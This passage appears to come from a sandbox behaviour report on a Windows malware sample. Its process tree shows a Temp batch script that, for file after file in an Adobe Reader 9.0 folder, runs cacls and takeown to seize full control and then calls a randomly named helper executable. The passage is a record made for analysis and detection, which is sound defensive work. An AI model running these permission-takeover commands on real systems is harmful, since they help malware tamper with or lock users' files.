  2⤵
  PID:1928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"
    3⤵
    - Modifies file permissions
    PID:328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "info.gif" -nobanner
    3⤵
    PID:1000
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "info.gif" -nobanner
      4⤵
      PID:684
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1256
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""
  2⤵
  PID:1332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "rss.gif" -nobanner
    3⤵
    PID:1516
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "rss.gif" -nobanner
      4⤵
      PID:1540
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""
  2⤵
  PID:1400
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"
    3⤵
    - Modifies file permissions
    PID:384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
    3⤵
    PID:436
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "turnOffNotificationInTray.gif" -nobanner
      4⤵
      PID:1508
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  PID:320
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"
    3⤵
    - Modifies file permissions
    PID:1080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "review_same_reviewers.gif" -nobanner
    3⤵
    PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "review_same_reviewers.gif" -nobanner
      4⤵
      PID:820
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  PID:1928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    PID:948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "trash.gif" -nobanner
    3⤵
    PID:1840
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "trash.gif" -nobanner
      4⤵
      PID:592
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CourierStd-Oblique.otf" -nobanner
    3⤵
    PID:384
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CourierStd-Oblique.otf" -nobanner
      4⤵
      PID:1316
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  PID:1572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    - Modifies file permissions
    PID:1884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    PID:1436
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      PID:1000
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1256
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "MyriadPro-It.otf" -nobanner
    3⤵
    PID:752
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "MyriadPro-It.otf" -nobanner
      4⤵
      PID:1812
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
    3⤵
    PID:1628
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
      4⤵
      PID:1508
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "can.hyp" -nobanner
    3⤵
    PID:1884
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "can.hyp" -nobanner
      4⤵
      PID:820
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""
  2⤵
  PID:1256
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"
    3⤵
    PID:788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "SY______.PFM" -nobanner
    3⤵
    PID:1864
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "SY______.PFM" -nobanner
      4⤵
      PID:1836
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""
  2⤵
  PID:1392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
    3⤵
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
      4⤵
      PID:1804
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""
  2⤵
  PID:1032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C
    3⤵
    PID:908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"
    3⤵
    - Modifies file permissions
    PID:1292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "usa37.hyp" -nobanner
    3⤵
    PID:1708
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "usa37.hyp" -nobanner
      4⤵
      PID:1000
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""
  2⤵
  PID:1436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C
    3⤵
    PID:304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "can129.hsp" -nobanner
    3⤵
    PID:788
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "can129.hsp" -nobanner
      4⤵
      PID:1812
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"
    3⤵
    PID:1316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "icudt26l.dat" -nobanner
    3⤵
    PID:1232
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "icudt26l.dat" -nobanner
      4⤵
      PID:1004
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""
  2⤵
  PID:2040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C
    3⤵
    PID:908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"
    3⤵
    - Modifies file permissions
    PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "ICELAND.TXT" -nobanner
    3⤵
    PID:1844
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "ICELAND.TXT" -nobanner
      4⤵
      PID:1936
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""
  2⤵
  PID:932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C
    3⤵
    PID:304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"
    3⤵
    - Modifies file permissions
    PID:1824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CP1254.TXT" -nobanner
    3⤵
    PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CP1254.TXT" -nobanner
      4⤵
      PID:592
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""
  2⤵
  PID:1572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "ROMANIAN.TXT" -nobanner
    3⤵
    PID:1736
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "ROMANIAN.TXT" -nobanner
      4⤵
      PID:320
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1060
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""
  2⤵
  PID:1888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"
    3⤵
    - Modifies file permissions
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CP1258.TXT" -nobanner
    3⤵
    PID:684
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CP1258.TXT" -nobanner
      4⤵
      PID:1132
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1360
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""
  2⤵
  PID:1916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C
    3⤵
    PID:1824
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"
    3⤵
    - Modifies file permissions
    PID:752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "ended_review_or_form.gif" -nobanner
    3⤵
    PID:1864
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "ended_review_or_form.gif" -nobanner
      4⤵
      PID:932
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""
  2⤵
  PID:1004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "reviewers.gif" -nobanner
    3⤵
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "reviewers.gif" -nobanner
      4⤵
      PID:2024
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""
  2⤵
  PID:1568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C
    3⤵
    PID:240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"
    3⤵
    - Modifies file permissions
    PID:684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "server_lg.gif" -nobanner
    3⤵
    PID:2040
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "server_lg.gif" -nobanner
      4⤵
      PID:1900
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""
  2⤵
  PID:1824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
    3⤵
    PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
      4⤵
      PID:1552
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1052
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"
    3⤵
    - Modifies file permissions
    PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "MinionPro-Bold.otf" -nobanner
    3⤵
    PID:1000
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "MinionPro-Bold.otf" -nobanner
      4⤵
      PID:1912
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""
  2⤵
  PID:2032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "zy______.pfm" -nobanner
    3⤵
    PID:1936
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "zy______.pfm" -nobanner
      4⤵
      PID:1056
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""
  2⤵
  PID:1864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"
    3⤵
    PID:472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "brt.fca" -nobanner
    3⤵
    PID:1256
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "brt.fca" -nobanner
      4⤵
      PID:752
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
